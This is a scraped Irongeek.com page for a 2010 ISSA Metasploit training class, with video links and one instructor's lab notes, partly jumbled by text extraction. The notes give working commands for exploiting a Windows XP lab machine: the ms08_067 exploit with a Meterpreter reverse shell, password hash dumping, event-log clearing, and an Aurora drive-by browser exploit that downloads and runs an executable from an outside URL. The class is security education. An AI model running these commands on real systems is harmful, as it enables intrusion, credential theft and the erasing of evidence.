Feel free to include my content in your page via my
RSS feed
Follow @irongeek_adc
Help Irongeek.com pay for
bandwidth and research equipment:
Search Irongeek.com:
Help Irongeek.com pay for bandwidth and research equipment:
Metasploit Class
Videos On May 8th 2010 the
Kentuckiana
ISSA held a 7 hour Metasploit class at the Brown hotel in Louisville Ky.
Proceeds from the class went to the
Hackers For Charity Food for Work program.
The instructors were David "ReL1K" Kennedy, Martin "PureHate" Bos, Elliott "Nullthreat" Cutright, Pwrcycle
and Adrian "Irongeek" Crenshaw. Below are the videos of the
event. I hope you enjoy them, and if you do please consider donating to Johnny
Longs' organization. This should be more Metasploit than you can stand! Note: For best viewing download the AVIs, the streaming versions are not as
high quality. 1 Metasploit Intro - Irongeek [フレーム] Download video: Slides can be found at:
[フレーム] Download video: Slides can be found at:
[フレーム]
Download video: Slides can be found at: [フレーム] Slides can be found at: [フレーム] Download video:
[フレーム] Slides can be found at: Websites of the groups and people involved in setting up the class: http://www.hackersforcharity.org
What follows are the class notes for Adrian's section: Metasploit Intro: Class
Notes -------------------------------------------------------- startx Then, since the network starts off as disabled (a good
idea so as not to announce yourself on the network till you are ready) let's
bring it up and note our IP: /etc/init.d/networking start ifconfig ipconfig msfupdate msfcli | less msfgui msfweb& http://127.0.0.1:55555 psexec On the list that comes up, choose "Microsoft
Windows Authenticated User Code Execution", "Automatic"
and for payload choose "windows/vncinject/reverse_tcp" msfconsole ifconfig help search netapi info windows/smb/ms08_067_netapi use exploit/windows/smb/ms08_067_netapi setg payload windows/meterpreter/reverse_tcp set encoder x86/shikata_ga_nai show
options Anything else cool we can do to customize the pwnage? show advanced Ok, let痴 set some required options that don稚 already
have defaults, fill in the items in brackets accordingly: setg
rhost <XP box's IP> Now let痴 tell Metasploit to fire off the exploit, and see
if things work: exploit help sysinfo shell Get back to the MSFConsole prompt: background Ok, let's get back into our Meterpreter session: sessions -i 1 <We are now in Meterpreter> execute -f notepad.exe
hashdump Clear the event log: clearev run scraper screenshot msfconsole http://<ip of BT4 box>:8080/pwnme Under BT4, web surf to: http://<ip of XP box>
http://www.offensive-security.com/metasploit-unleashed/
http://www.archive.org/download/LouisvilleMetasploitClass/1MetasploitIntro-Irongeek.avi
http://www.irongeek.com/downloads/metasploit-intro.pdf
2 Metasploit Scanning and Pivoting - Pwrcycle
http://www.archive.org/download/LouisvilleMetasploitClass/2MetasploitScanningAndPivoting-Pwrcycle.avi
http://cafecode.com/metasploit/
3 Metasploit Fuzzing and Exploit Development - Nullthreat
http://www.archive.org/download/LouisvilleMetasploitClass/3MetasploitFuzzingAndExploitDevelopment-Nullthreat.avi
http://www.nullthreat.net
4 Meterpreter and Post Exploitation (and a demo of Metasploit Express) -
Purehate
Download video:
http://www.archive.org/download/LouisvilleMetasploitClass/4MeterpreterAndPostExploitation-Purehate.avi
http://bit.ly/d8QZwR
5 Social Engineering Toolkit - ReL1K
http://www.archive.org/download/LouisvilleMetasploitClass/5SocialEngineeringToolkit-Rel1k.avi
6 More Encoding Fun, Fasttrack and Closing - ReL1K
Download video:
http://www.archive.org/download/LouisvilleMetasploitClass/6MoreEncodingFasttrackAndClosing-Rel1k.avi
http://www.secmaniac.com (whenever
Dave puts them out there :) )
http://www.metasploit.com
http://www.issa-kentuckiana.org
http://www.offensive-security.com
http://www.secmaniac.com
http://tools.question-defense.com
http://www.nullthreat.net
http://indysec.blogspot.com/
http://irongeek.com
This sheet is meant to be a convenient set of notes for the exercises
Adrian will be demonstrating in class. These are the commands used in the
demos for your reference, along with why they were used. Items in
blue are things you type, green
are things you click, gray is something optional that you may
want to play with latter and red is just to
grab your attention.
Exercise 0: Getting into BackTrack 4
--------------------------------------------------------
Login with "root" as the user name and "toor"
as the password. So we can more easily get around, we will also start up X
windows:
--------------------------------------------------------
Exercise 0.5: Login to XP
--------------------------------------------------------
Log in with "IndySploit" as the user name and "password"
as the password. Then note our IP (Students will not need to do this step
unless they brought their own XP VM):
--------------------------------------------------------
Exercise 1: A few simple commands for Metasploit in BT4
--------------------------------------------------------
I plan to point these commands out, but not run them to completion.
Grab the latest Metasploit Modules:
If you want to script some stuff later, look into:
There is also the GUI, but we will not be using it in class:
--------------------------------------------------------
Exercise 2: Let's Demo Metasploit MSFWeb interface in BT4
--------------------------------------------------------
To start off easy let痴 use the web interface. It is not as well supported
as msfconsole, but it痴 prettier to show management the easy of exploitation
(the ampersand is there so we can keep typing commands at the shell):
Now let's start FireFox and go to:
You will most likely have to disable NoScript to het the web interface to
work correctly.
Now that we have the web interface up, let's look for a module to use. Click
"Exploit", and on the search bar enter:
For the RHOST enter the IP of the XP box. SMB Password and SMB User are
"password" and "IndySploit"
respectively. For LHOST enter the BT4 box's IP. Not clicking the "Launch Exploit"
button should be all we need to do to get a lovely VNC session.
--------------------------------------------------------
Exercise 3: Let's use MSFConsole under BT4
--------------------------------------------------------
Fire up the MSFConsole:
Now note that you can type normal *nix commands for inside of MSFConsole:
When in doubt, scream and shout:
Also note, tab completion works.
Now in MSFWeb we did not use a real vulnerability (psexec really is a
feature), so let痴 try an exploit this time. First let痴 find an exploit:
Ok, we found one I want to use, let's find out more about it:
Sounds good, let's use it:
Now we need to set some options. We can use "set" to just set them this one
time, or use "setg" so they stick around if we switch to another module. Use
"back", "unset" or "unsetg" if you screw up and have a typo. Let select a
payload to use:
We could also set an encoder to use, but this is optional:
Ok, what options do we need to set?
setg lhost <BT4 box's IP>
If that worked, we should have a Meterpreter session. Martin will talk more
on Meterpreter later, but here are a few Commands to try:
<We are now in Meterpreter>
Get some help:
Let痴 get some info about the system:
Get a command prompt on the exploited box:
exit
<We are now out of Meterpreter>
Ok, what sessions are there?
help sessions
sessions
We will try to run a command on the remote box, and see it in the process
list:
ps
Grab some hashes:
Run a Meterpreter script:
A bunch of nifty stuff should now be in /root/.msf3/logs/scraper/
If you have updated to the latest version, this is a also a fun command:
--------------------------------------------------------
Exercise 4: Extra credit, start a server on your box and do a drive by
browser exploit
--------------------------------------------------------
(You will need to have an Internet connection, used
msfupdate to get the latest modules, and have a webcam hooked up to the
exploited box. Or you could just modify these commands to work for your
circumstances.)
Under BT4 VM :
use exploit/windows/browser/ms10_002_aurora
set uripath pwnme
set payload windows/download_exec
set url http://irongeek.com/temp/camserver.exe
exploit
On the XP box, web surf to:
Useful Links:
http://www.irongeek.com/
http://www.secmaniac.com/
http://tools.question-defense.com
http://www.room362.com/
http://www.darkoperator.com/meterpreter/
http://www.isd-podcast.com/
15 most recent posts on Irongeek.com:
If you would like to republish one of the articles from this site on your
webpage or print journal please contact IronGeek.
Copyright 2020, IronGeek
Louisville / Kentuckiana Information Security Enthusiast